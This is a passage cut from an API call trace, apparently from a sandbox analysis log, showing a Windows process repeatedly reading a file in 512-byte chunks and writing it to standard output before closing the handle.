liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e288 | out: lpNewFilePointer=0x0) returned 1 [0147.426] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.426] ReadFile (in: hFile=0x54, lpBuffer=0x14f0b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2a8, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesRead=0x14e2a8*=0x200, lpOverlapped=0x0) returned 1 [0147.426] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.426] GetFileType (hFile=0x4c) returned 0x1 [0147.426] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.426] GetFileType (hFile=0x4c) returned 0x1 [0147.426] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.426] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.426] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.426] GetFileType (hFile=0x4c) returned 0x1 [0147.426] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0147.426] WriteFile (in: hFile=0x4c, lpBuffer=0x14f108*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f108*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.426] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.426] GetFileType (hFile=0x4c) returned 0x1 [0147.426] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.427] WriteFile (in: hFile=0x4c, lpBuffer=0x14f158*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f158*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.427] GetFileType (hFile=0x4c) returned 0x1 [0147.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.427] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1a8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.427] GetFileType (hFile=0x4c) returned 0x1 [0147.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.427] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1f8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.427] GetFileType (hFile=0x4c) returned 0x1 [0147.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.427] WriteFile (in: hFile=0x4c, lpBuffer=0x14f248*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f248*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.427] GetFileType (hFile=0x4c) returned 0x1 [0147.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.427] WriteFile (in: hFile=0x4c, 
lpBuffer=0x14f298*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f298*, lpNumberOfBytesWritten=0x14e29c*=0x20, lpOverlapped=0x0) returned 1 [0147.427] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.427] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e288 | out: lpNewFilePointer=0x0) returned 1 [0147.427] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.427] ReadFile (in: hFile=0x54, lpBuffer=0x14f0b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2a8, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesRead=0x14e2a8*=0x200, lpOverlapped=0x0) returned 1 [0147.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.427] GetFileType (hFile=0x4c) returned 0x1 [0147.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.427] GetFileType (hFile=0x4c) returned 0x1 [0147.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.428] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.428] GetFileType (hFile=0x4c) returned 0x1 [0147.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.428] WriteFile (in: hFile=0x4c, lpBuffer=0x14f108*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f108*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.428] GetFileType (hFile=0x4c) returned 0x1 [0147.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.428] WriteFile (in: hFile=0x4c, lpBuffer=0x14f158*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f158*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.428] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0147.428] GetFileType (hFile=0x4c) returned 0x1 [0147.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.428] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1a8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.428] GetFileType (hFile=0x4c) returned 0x1 [0147.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.428] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1f8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.428] GetFileType (hFile=0x4c) returned 0x1 [0147.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.428] WriteFile (in: hFile=0x4c, lpBuffer=0x14f248*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f248*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.429] GetFileType (hFile=0x4c) returned 0x1 [0147.429] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.429] WriteFile (in: hFile=0x4c, lpBuffer=0x14f298*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f298*, lpNumberOfBytesWritten=0x14e29c*=0x20, lpOverlapped=0x0) returned 1 [0147.429] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.429] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e288 | out: lpNewFilePointer=0x0) returned 1 [0147.429] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.429] ReadFile (in: hFile=0x54, lpBuffer=0x14f0b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2a8, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesRead=0x14e2a8*=0x200, 
lpOverlapped=0x0) returned 1 [0147.429] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.429] GetFileType (hFile=0x4c) returned 0x1 [0147.429] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.429] GetFileType (hFile=0x4c) returned 0x1 [0147.429] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.429] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.429] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.429] GetFileType (hFile=0x4c) returned 0x1 [0147.429] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.429] WriteFile (in: hFile=0x4c, lpBuffer=0x14f108*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f108*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.429] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.429] GetFileType (hFile=0x4c) returned 0x1 [0147.429] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.429] WriteFile (in: hFile=0x4c, lpBuffer=0x14f158*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f158*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.429] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.429] GetFileType (hFile=0x4c) returned 0x1 [0147.430] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.430] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1a8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.430] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.430] GetFileType (hFile=0x4c) returned 0x1 [0147.430] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.430] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 
| out: lpBuffer=0x14f1f8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.430] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.430] GetFileType (hFile=0x4c) returned 0x1 [0147.430] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.430] WriteFile (in: hFile=0x4c, lpBuffer=0x14f248*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f248*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.430] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.430] GetFileType (hFile=0x4c) returned 0x1 [0147.430] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.430] WriteFile (in: hFile=0x4c, lpBuffer=0x14f298*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f298*, lpNumberOfBytesWritten=0x14e29c*=0x20, lpOverlapped=0x0) returned 1 [0147.430] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.430] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e288 | out: lpNewFilePointer=0x0) returned 1 [0147.430] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.430] ReadFile (in: hFile=0x54, lpBuffer=0x14f0b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2a8, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesRead=0x14e2a8*=0x200, lpOverlapped=0x0) returned 1 [0147.430] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.430] GetFileType (hFile=0x4c) returned 0x1 [0147.430] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.430] GetFileType (hFile=0x4c) returned 0x1 [0147.430] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.430] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.431] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.431] GetFileType (hFile=0x4c) returned 0x1 [0147.431] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0147.431] WriteFile (in: hFile=0x4c, lpBuffer=0x14f108*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f108*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.431] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.431] GetFileType (hFile=0x4c) returned 0x1 [0147.431] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.431] WriteFile (in: hFile=0x4c, lpBuffer=0x14f158*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f158*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.431] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.431] GetFileType (hFile=0x4c) returned 0x1 [0147.431] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.431] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1a8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.431] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.431] GetFileType (hFile=0x4c) returned 0x1 [0147.431] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.431] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1f8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.431] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.431] GetFileType (hFile=0x4c) returned 0x1 [0147.431] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.431] WriteFile (in: hFile=0x4c, lpBuffer=0x14f248*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f248*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.431] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.431] GetFileType (hFile=0x4c) returned 0x1 [0147.431] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0147.431] WriteFile (in: hFile=0x4c, lpBuffer=0x14f298*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f298*, lpNumberOfBytesWritten=0x14e29c*=0x20, lpOverlapped=0x0) returned 1 [0147.432] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.432] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e288 | out: lpNewFilePointer=0x0) returned 1 [0147.432] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.432] ReadFile (in: hFile=0x54, lpBuffer=0x14f0b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2a8, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesRead=0x14e2a8*=0x200, lpOverlapped=0x0) returned 1 [0147.432] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.432] GetFileType (hFile=0x4c) returned 0x1 [0147.432] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.432] GetFileType (hFile=0x4c) returned 0x1 [0147.432] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.432] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.432] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.432] GetFileType (hFile=0x4c) returned 0x1 [0147.432] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.432] WriteFile (in: hFile=0x4c, lpBuffer=0x14f108*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f108*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.432] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.432] GetFileType (hFile=0x4c) returned 0x1 [0147.432] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.432] WriteFile (in: hFile=0x4c, lpBuffer=0x14f158*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f158*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 
[0147.432] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.432] GetFileType (hFile=0x4c) returned 0x1 [0147.432] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.432] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1a8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.433] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.433] GetFileType (hFile=0x4c) returned 0x1 [0147.433] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.433] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1f8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.433] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.433] GetFileType (hFile=0x4c) returned 0x1 [0147.433] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.433] WriteFile (in: hFile=0x4c, lpBuffer=0x14f248*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f248*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.433] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.433] GetFileType (hFile=0x4c) returned 0x1 [0147.433] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.433] WriteFile (in: hFile=0x4c, lpBuffer=0x14f298*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f298*, lpNumberOfBytesWritten=0x14e29c*=0x20, lpOverlapped=0x0) returned 1 [0147.433] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.433] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e288 | out: lpNewFilePointer=0x0) returned 1 [0147.433] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.433] ReadFile (in: hFile=0x54, lpBuffer=0x14f0b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2a8, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, 
lpNumberOfBytesRead=0x14e2a8*=0x200, lpOverlapped=0x0) returned 1 [0147.433] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.433] GetFileType (hFile=0x4c) returned 0x1 [0147.433] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.433] GetFileType (hFile=0x4c) returned 0x1 [0147.433] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.433] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.433] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.433] GetFileType (hFile=0x4c) returned 0x1 [0147.433] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.434] WriteFile (in: hFile=0x4c, lpBuffer=0x14f108*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f108*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.434] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.434] GetFileType (hFile=0x4c) returned 0x1 [0147.434] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.434] WriteFile (in: hFile=0x4c, lpBuffer=0x14f158*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f158*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.434] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.434] GetFileType (hFile=0x4c) returned 0x1 [0147.434] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.434] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1a8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.434] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.434] GetFileType (hFile=0x4c) returned 0x1 [0147.434] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.434] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1f8*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1f8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.434] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.434] GetFileType (hFile=0x4c) returned 0x1 [0147.434] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.434] WriteFile (in: hFile=0x4c, lpBuffer=0x14f248*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f248*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.434] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.434] GetFileType (hFile=0x4c) returned 0x1 [0147.434] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.434] WriteFile (in: hFile=0x4c, lpBuffer=0x14f298*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f298*, lpNumberOfBytesWritten=0x14e29c*=0x20, lpOverlapped=0x0) returned 1 [0147.434] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.434] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e288 | out: lpNewFilePointer=0x0) returned 1 [0147.434] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.434] ReadFile (in: hFile=0x54, lpBuffer=0x14f0b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2a8, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesRead=0x14e2a8*=0x200, lpOverlapped=0x0) returned 1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] GetFileType (hFile=0x4c) returned 0x1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] GetFileType (hFile=0x4c) returned 0x1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] GetFileType 
(hFile=0x4c) returned 0x1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] WriteFile (in: hFile=0x4c, lpBuffer=0x14f108*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f108*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] GetFileType (hFile=0x4c) returned 0x1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] WriteFile (in: hFile=0x4c, lpBuffer=0x14f158*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f158*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] GetFileType (hFile=0x4c) returned 0x1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1a8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] GetFileType (hFile=0x4c) returned 0x1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1f8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] GetFileType (hFile=0x4c) returned 0x1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] WriteFile (in: hFile=0x4c, lpBuffer=0x14f248*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f248*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.436] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.436] GetFileType (hFile=0x4c) returned 0x1 [0147.436] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0147.436] WriteFile (in: hFile=0x4c, lpBuffer=0x14f298*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f298*, lpNumberOfBytesWritten=0x14e29c*=0x20, lpOverlapped=0x0) returned 1 [0147.436] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.436] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e288 | out: lpNewFilePointer=0x0) returned 1 [0147.436] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.436] ReadFile (in: hFile=0x54, lpBuffer=0x14f0b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2a8, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesRead=0x14e2a8*=0x32, lpOverlapped=0x0) returned 1 [0147.436] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.436] GetFileType (hFile=0x4c) returned 0x1 [0147.436] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.436] GetFileType (hFile=0x4c) returned 0x1 [0147.436] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.436] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0b8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesWritten=0x14e29c*=0x32, lpOverlapped=0x0) returned 1 [0147.436] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.436] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e288 | out: lpNewFilePointer=0x0) returned 1 [0147.436] _close (_FileHandle=4) returned 0 [0147.436] FindNextFileW (in: 